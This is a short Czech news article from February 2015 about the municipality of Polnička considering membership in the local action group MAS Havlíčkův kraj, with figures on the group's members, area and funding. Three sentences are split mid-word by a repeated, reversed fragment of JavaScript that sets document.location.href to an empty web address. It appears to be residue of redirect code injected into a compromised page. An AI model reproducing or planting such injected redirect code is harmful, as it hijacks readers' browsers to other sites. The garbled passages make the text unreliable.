Rainbow page separator

Polnička uvažuje o vstupu do Havlíčkova kraje

Čtvrtek, 19. února 2015

MAS Havlíčkův kraj

Polnička / O vstupu do Místní akční skupiny (MAS) Havlíčkův kraj budou v pondělí 23. února jednat zastupitelé Polničky. Vstup do místní akční skupiny zastupitelům ke schválení doporučili tamní radní. Stejně tak radní doporučili přizvat na jednání zastupitelstva vedení místní akční skupiny.
Ještě předtím se radní Polničky zúčastnili jednání se členy žďárského klubu zastupitelů, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože i Žďár nad Sázavou hodlá v nejbližší době do MAS Havlíčkův kraj vs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit.
Místní akční skupina Havlíčkův kraj je dobrovolné sdružení obcí, podnikatelů a neziskových organizací, které společně řeší možnosti dotačních titulů pro konkrétní záměry; v současné době se jedná o plánovací období 2014 – 2020 a MAS disponuje předběžně dotačním objemem kolem 100 milionů korun, přičemž spolufinancování je zpravidla kolem pěti procent. Místní akční skupina Havlíčkův kraj nyní sdružuje jednašedesát obcí, zahrnuje území 648 kilometrů čtverečních s více než šestatřiceti tisíci obyvateli a čítá celkem s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovku členů.